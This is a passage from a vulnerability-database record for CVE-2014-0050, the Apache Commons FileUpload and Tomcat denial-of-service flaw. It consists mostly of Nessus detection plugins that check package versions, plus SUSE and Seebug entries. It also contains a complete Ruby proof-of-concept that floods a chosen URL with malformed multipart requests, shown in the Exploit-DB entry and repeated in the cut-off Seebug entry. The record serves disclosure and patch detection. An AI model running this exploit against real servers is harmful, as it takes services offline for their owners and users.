script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-commons-fileupload\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-commons-fileupload-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:maven\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:maven-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", 
\"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"apache-commons-fileupload-1.2.2-7.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"apache-commons-fileupload-javadoc-1.2.2-7.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"maven-3.0.4-29.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"maven-javadoc-3.0.4-29.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-admin-webapps-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-docs-webapp-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-el-2.2-api-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-javadoc-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-jsp-2.2-api-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-jsvc-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-lib-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-servlet-3.0-api-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-webapps-7.0.41-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity 
> 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-01T07:00:05", "description": "The version of VMware vCenter Orchestrator installed on the remote\nhost is 5.5.x prior to 5.5.2. It is, therefore, affected by a denial\nof service vulnerability due to an error that exists in the included\nApache Tomcat version related to handling 'Content-Type' HTTP headers\nand multipart requests.", "edition": 26, "published": "2014-10-24T00:00:00", "title": "VMware vCenter Orchestrator 5.5.x < 5.5.2 DoS (VMSA-2014-0007)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_orchestrator"], "id": "VMWARE_ORCHESTRATOR_VMSA_2014_0007.NASL", "href": "https://www.tenable.com/plugins/nessus/78671", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78671);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_xref(name:\"VMSA\", value:\"2014-0007\");\n\n script_name(english:\"VMware vCenter Orchestrator 5.5.x < 5.5.2 DoS (VMSA-2014-0007)\");\n script_summary(english:\"Checks the version of VMware vCenter Orchestrator.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization application installed that is\naffected by a denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Orchestrator installed on the remote\nhost is 5.5.x prior to 5.5.2. 
It is, therefore, affected by a denial\nof service vulnerability due to an error that exists in the included\nApache Tomcat version related to handling 'Content-Type' HTTP headers\nand multipart requests.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0007.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCenter Orchestrator 5.5.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0050\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_orchestrator\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vcenter_orchestrator_installed.nbin\");\n script_require_keys(\"installed_sw/VMware vCenter Orchestrator\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp_name = \"VMware vCenter Orchestrator\";\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\n\nversion = install['version'];\nverui = install['VerUI'];\npath = install['path'];\n\nif (version =~ '^5\\\\.5\\\\.')\n{\n build = install['Build'];\n if (empty_or_null(build)) exit(1, 'The ' + app_name + ' build number is missing.');\n\n if (int(build) < 1951762)\n {\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + verui +\n '\\n Fixed version : 5.5.2 Build 1951762' +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n }\n}\naudit(AUDIT_INST_PATH_NOT_VULN, app_name, verui, path);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:12:31", "description": "This update fixes a denial of service vulnerability which could be\ntriggered by specially crafted input if the buffer used by the\nMultipartStream was not big enough.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2014-02-18T00:00:00", "title": "Fedora 20 : apache-commons-fileupload-1.3-5.fc20 (2014-2175)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2014-02-18T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:apache-commons-fileupload", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-2175.NASL", "href": "https://www.tenable.com/plugins/nessus/72544", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-2175.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72544);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_xref(name:\"FEDORA\", value:\"2014-2175\");\n\n script_name(english:\"Fedora 20 : apache-commons-fileupload-1.3-5.fc20 (2014-2175)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a denial of service vulnerability which could be\ntriggered by specially crafted input if the buffer used by the\nMultipartSteeam was not big enough.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1062337\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128499.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a6ea25eb\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache-commons-fileupload package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:apache-commons-fileupload\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, 
\"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"apache-commons-fileupload-1.3-5.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-commons-fileupload\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T15:48:46", "description": "The version of IBM WebSphere Portal on the remote host is affected by\na denial of service vulnerability in the Apache Commons FileUpload\nlibrary that allows an attacker to cause the application to enter an\ninfinite loop.", "edition": 25, "published": "2014-06-03T00:00:00", "title": "IBM WebSphere Portal Apache Commons FileUpload DoS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2014-06-03T00:00:00", "cpe": ["cpe:/a:ibm:websphere_portal"], "id": "WEBSPHERE_PORTAL_CVE-2014-0050.NASL", "href": "https://www.tenable.com/plugins/nessus/74293", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74293);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n 
script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_xref(name:\"EDB-ID\", value:\"31615\");\n\n script_name(english:\"IBM WebSphere Portal Apache Commons FileUpload DoS\");\n script_summary(english:\"Checks for installed patches.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has web portal software installed that is\naffected by a denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of IBM WebSphere Portal on the remote host is affected by\na denial of service vulnerability in the Apache Commons FileUpload\nlibrary that allows an attacker to cause the application to enter an\ninfinite loop.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?uid=swg21672575\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?uid=swg24029452#CF028\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?uid=swg24034497#CF12\");\n # https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin_fixes_available_for_vulnerability_in_apache_commons_fileupload_contained_in_ibm_websphere_portal_cve_2014_0050?lang=en_us\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?12fd87aa\");\n script_set_attribute(attribute:\"solution\", value:\n\"For 6.1.x, first upgrade to either : Fix Pack 6.1.0.6 CF27 or Fix Pack\n6.1.5.3 CF27; then apply Interim Fixes PI14025, PI14027, PI14028,\nPI14029, PI14086, PI14150, PI14812, PI15187, and PI17908.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0050\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", 
value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ibm:websphere_portal\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"websphere_portal_installed.nbin\");\n script_require_keys(\"installed_sw/IBM WebSphere Portal\");\n\n exit(0);\n}\n\ninclude(\"websphere_portal_version.inc\");\n\nefixes = \"PI14025, PI14027, PI14028, PI14029, PI14086, PI14150, PI14812, PI15187, PI17908\";\n\nwebsphere_portal_check_version(\n checks:make_array(\n \"6.1.5.0, 6.1.5.3, CF27\", make_list(efixes),\n \"6.1.0.0, 6.1.0.6, CF27\", make_list(efixes),\n \"6.0.0.0, 6.0.0.1\", make_list(efixes)\n ),\n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-14T19:09:32", "description": "According to its self-reported version number, the instance of Apache\nTomcat 8.0.x listening on the remote host is a version prior to 8.0.3.\nIt is, therefore, affected by a denial of service vulnerability due to\nan error related to handling 'Content-Type' HTTP headers and multipart\nrequests such as file uploads.\n\nNote that this error exists because of the bundled version of Apache\nCommons FileUpload.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 18, "cvss3": {"score": 5.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"}, "published": "2014-02-25T00:00:00", "title": "Apache Tomcat 8.0.x < 8.0.3 
Content-Type DoS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2014-02-25T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_8_0_3.NASL", "href": "https://www.tenable.com/plugins/nessus/72693", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72693);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/11\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_xref(name:\"EDB-ID\", value:\"31615\");\n\n script_name(english:\"Apache Tomcat 8.0.x < 8.0.3 Content-Type DoS\");\n script_summary(english:\"Checks the Apache Tomcat version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected by a denial of service\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the instance of Apache\nTomcat 8.0.x listening on the remote host is a version prior to 8.0.3.\nIt is, therefore, affected by a denial of service vulnerability due to\nan error related to handling 'Content-Type' HTTP headers and multipart\nrequests such as file uploads.\n\nNote that this error exists because of the bundled version of Apache\nCommons FileUpload.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.0.3\");\n # http://mail-archives.apache.org/mod_mbox/www-announce/201402.mbox/%3C52F373FC.9030907@apache.org%3E\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?358ef049\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to Apache Tomcat version 8.0.3 or later.\");\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0050\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n\n exit(0);\n}\n\ninclude(\"tomcat_version.inc\");\n\n# Note that 8.0.2 contained the fix,\n# but was never released.\ntomcat_check_version(fixed:\"8.0.2\", min:\"8.0.0\", severity:SECURITY_HOLE, granularity_regex:\"^8(\\.0)?$\");\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T15:04:57", "description": "Apache Commons FileUpload and Apache Tomcat - Denial-of-Service. CVE-2014-0050. 
Dos exploits for multiple platform", "published": "2014-02-12T00:00:00", "type": "exploitdb", "title": "Apache Commons FileUpload and Apache Tomcat - Denial-of-Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0050"], "modified": "2014-02-12T00:00:00", "id": "EDB-ID:31615", "href": "https://www.exploit-db.com/exploits/31615/", "sourceData": "#################################################################################\r\n# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service\t#\r\n# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n# Author: Oren Hafif, Trustwave SpiderLabs Research\t\t\t\t\t\t\t\t#\r\n# This is a Proof of Concept code that was created for the sole purpose \t\t#\r\n# of assisting system administrators in evaluating whether their applications \t#\r\n# are vulnerable to this issue or not\t\t\t\t\t\t\t\t\t\t\t#\r\n# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n# Please use responsibly.\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n#################################################################################\r\n\r\n\r\nrequire 'net/http'\r\nrequire 'net/https'\r\nrequire 'optparse'\r\nrequire 'openssl'\r\n\r\n\r\noptions = {}\r\n\r\nopt_parser = OptionParser.new do |opt|\r\n opt.banner = \"Usage: ./CVE-2014-0050.rb [OPTIONS]\"\r\n opt.separator \"\"\r\n opt.separator \"Options\"\r\n opt.on(\"-u\",\"--url URL\",\"The url of the Servlet/JSP to test for Denial of Service\") do |url|\r\n options[:url] = url\r\n end\r\n\r\n opt.on(\"-n\",\"--number_of_requests NUMBER_OF_REQUSETS\",\"The number of requests to send to the server. 
The default value is 10\") do |number_of_requests|\r\n options[:number_of_requests] = number_of_requests\r\n end\r\n\r\n opt.on(\"-h\",\"--help\",\"help\") do\r\n \tputs \"\"\r\n puts \"#################################################################################\"\r\n\tputs \"# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #\"\r\n\tputs \"# #\"\r\n\tputs \"# Author: Oren Hafif, Trustwave SpiderLabs Research #\"\r\n\tputs \"# This is a Proof of Concept code that was created for the sole purpose #\"\r\n\tputs \"# of assisting system administrators in evaluating whether or not #\"\r\n\tputs \"# their applications are vulnerable to this issue. #\"\r\n\tputs \"# #\"\r\n\tputs \"# Please use responsibly. #\"\r\n\tputs \"#################################################################################\"\r\n puts \"\"\r\n puts opt_parser\r\n puts \"\"\r\n \r\n\texit\r\n end\r\nend\r\n\r\nopt_parser.parse!\r\n\r\n\r\nuri = \"\"\r\nbegin\r\n\turi = URI.parse(options[:url])\r\nrescue Exception => e\r\n\tputs \"\"\r\n\tputs \"ERROR: Invalid URL was entered #{options[:url]}\"\r\n\tputs \"\"\r\n puts opt_parser\r\n exit\r\nend\r\n\r\nnumber_of_requests = 10;\r\nif(options[:number_of_requests] != nil)\r\n\tbegin\r\n\t\tnumber_of_requests = Integer( options[:number_of_requests] )\r\n\t\tthrow Exception.new if number_of_requests <= 0 \r\n\trescue Exception => e\r\n\t\tputs e\r\n\t\tputs \"\"\r\n\t\tputs \"ERROR: Invalid NUMBER_OF_REQUSETS was entered #{options[:number_of_requests]}\"\r\n\t\tputs \"\"\r\n\t puts opt_parser\r\n\t exit\r\n\tend\r\nend\r\n\r\n#uri = URI.parse(uri)\r\n\r\n\r\nputs \"\"\r\nputs \"WARNING: Usage of this tool for attack purposes is forbidden - press Ctrl-C now to abort...\"\r\ni=10\r\ni.times { print \"#{i.to_s}...\";sleep 1; i-=1;}\r\nputs \"\"\r\n\r\n\r\nnumber_of_requests.times do \r\n\tbegin\r\n\tputs \"Request Launched\"\r\n\thttps = Net::HTTP.new(uri.host,uri.port)\r\n\thttps.use_ssl = 
uri.scheme==\"https\"\r\n\thttps.verify_mode = OpenSSL::SSL::VERIFY_NONE\r\n\treq = Net::HTTP::Post.new(uri.path)\r\n\treq.add_field(\"Content-Type\",\"multipart/form-data; boundary=#{\"a\"*4092}\")\r\n\treq.add_field(\"lf-None-Match\",\"59e532f501ac13174dd9c488f897ee75\")\r\n\treq.body = \"b\"*4097\r\n\thttps.read_timeout = 1 \r\n\tres = https.request(req)\r\n\trescue Timeout::Error=>e\r\n\t\tputs \"Timeout - continuing DoS...\"\r\n\trescue Exception=>e\r\n\t\tputs e.inspect\r\n\tend\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/31615/"}], "suse": [{"lastseen": "2016-09-04T11:49:41", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "description": "This update fixes a security issue with\n jakarta-commons-fileupload:\n\n * bnc#862781: denial of service due to too-small buffer\n size used (CVE-2014-0050)\n", "edition": 1, "modified": "2014-04-17T21:04:15", "published": "2014-04-17T21:04:15", "id": "SUSE-SU-2014:0548-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00015.html", "title": "Security update for jakarta-commons-fileupload (important)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T16:36:25", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Apache Commons FileUpload and Apache Tomcat - Denial-of-Service", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0050"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-84935", "id": "SSV:84935", "sourceData": "\n #################################################################################\r\n# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service\t#\r\n# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n# Author: Oren Hafif, Trustwave SpiderLabs 
Research\t\t\t\t\t\t\t\t#\r\n# This is a Proof of Concept code that was created for the sole purpose \t\t#\r\n# of assisting system administrators in evaluating whether their applications \t#\r\n# are vulnerable to this issue or not\t\t\t\t\t\t\t\t\t\t\t#\r\n# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n# Please use responsibly.\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n#################################################################################\r\n\r\n\r\nrequire 'net/http'\r\nrequire 'net/https'\r\nrequire 'optparse'\r\nrequire 'openssl'\r\n\r\n\r\noptions = {}\r\n\r\nopt_parser = OptionParser.new do |opt|\r\n opt.banner = "Usage: ./CVE-2014-0050.rb [OPTIONS]"\r\n opt.separator ""\r\n opt.separator "Options"\r\n opt.on("-u","--url URL","The url of the Servlet/JSP to test for Denial of Service") do |url|\r\n options[:url] = url\r\n end\r\n\r\n opt.on("-n","--number_of_requests NUMBER_OF_REQUSETS","The number of requests to send to the server. The default value is 10") do |number_of_requests|\r\n options[:number_of_requests] = number_of_requests\r\n end\r\n\r\n opt.on("-h","--help","help") do\r\n \tputs ""\r\n puts "#################################################################################"\r\n\tputs "# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #"\r\n\tputs "# #"\r\n\tputs "# Author: Oren Hafif, Trustwave SpiderLabs Research #"\r\n\tputs "# This is a Proof of Concept code that was created for the sole purpose #"\r\n\tputs "# of assisting system administrators in evaluating whether or not #"\r\n\tputs "# their applications are vulnerable to this issue. #"\r\n\tputs "# #"\r\n\tputs "# Please use responsibly. 
